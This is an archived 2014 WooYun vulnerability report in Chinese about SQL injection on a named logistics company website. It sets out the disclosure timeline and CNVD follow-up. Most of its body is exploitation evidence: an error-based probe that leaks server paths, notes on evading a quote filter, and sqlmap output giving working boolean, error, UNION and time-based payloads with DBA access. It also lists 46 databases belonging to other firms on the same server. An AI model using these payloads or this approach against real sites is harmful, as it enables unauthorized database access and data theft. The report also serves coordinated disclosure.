乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-11: 细节已通知厂商并且等待厂商处理中 2014-08-16: 厂商已经确认,细节仅向厂商公开 2014-08-26: 细节向核心白帽子及相关领域专家公开 2014-09-05: 细节向普通白帽子公开 2014-09-15: 细节向实习白帽子公开 2014-09-25: 细节向公众公开
RTroot权限。。裤子 涉及多家物流公司 直接库名 www.库名.com
网站地址 www.szpsun56.comsql错误路径
http://www.szpsun56.com/news/html/?518.html
加个\报错
Database error: Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\' limit 0,1' at line 1)#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1) called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\db.inc.php:55] #1 dbbase_sql->query(select * from {P}_news_con where id='518\' limit 0,1) called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\includes\news.inc.php:36] #2 NewsToUrl() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\html\index.php:8] Database error: Invalid SQL: select title from pwn_news_con where id='518\'MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)#0 dbbase_sql->halt(Invalid SQL: select title from pwn_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\db.inc.php:55] #1 dbbase_sql->query(select title from {P}_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\module\NewsNavPath.php:101] #2 NewsNavPath() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\common.inc.php:524] #3 PrintPage() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\html\index.php:15] Database error: Invalid SQL: select * from pwn_news_con where id='518\'MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\db.inc.php:55] #1 dbbase_sql->query(select * from {P}_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\module\NewsContent.php:34] #2 NewsContent() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\common.inc.php:524] #3 PrintPage() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\html\index.php:15]
改地址
http://www.szpsun56.com/news/html/index.php?id=518
目测phpweb洞洞 上次官方更新了补丁。过滤了单引号。现在都是%27了、、、单引号不能直接的可参造单引号的绕过权限有点小大
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0current user is DBA: True
[19:20:42] [INFO] retrieved: "",""do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] ndo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] ndatabase management system user
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=518' AND 8992=8992 AND 'SvZD'='SvZD Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=518' AND (SELECT 2420 FROM(SELECT COUNT(*),CONCAT(0x716f646871,(SELECT (CASE WHEN (2420=2420) THEN 1 ELSE 0 END)),0x7162676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XPfj'='XPfj Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: id=-5917' UNION ALL SELECT CONCAT(0x716f646871,0x66646d46727573796d4b,0x7162676d71)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=518' AND SLEEP(5) AND 'cxmb'='cxmb---[19:11:24] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0
available databases [46]: [*] 021jadever[*] 0551kyaji[*] 0817jp[*] 0817yt[*] aaa[*] abc[*] baiqiang[*] ceshi[*] dataiyaojt[*] df999pme[*] fsmbhj[*] fsrattanjiaju[*] gjlpf[*] huaan56[*] information_schema[*] jadever021[*] kmxydn[*] men[*] menjing[*] minshi56[*] mysql[*] nchszs[*] nczxsj[*] qiyezhan[*] sdyspme[*] shoulianqingxin[*] sjgzs[*] suheng[*] sz56at[*] sz56stg[*] szjl56[*] szksdwl[*] szpsun56[*] szta[*] szta56[*] szxdwl[*] szxt56[*] tengyi[*] test[*] tfpme[*] wordpress[*] wxjz56[*] xiaoai[*] yiliao[*] zssj[*] ztuowl
.......
危害等级:高
漏洞Rank:14
确认时间:2014-08-16 08:34
2014-08-20:补充一下处置情况:CNVD确认并复现所述情况,已经由CNVD按网站公开渠道向网站管理方邮件通报。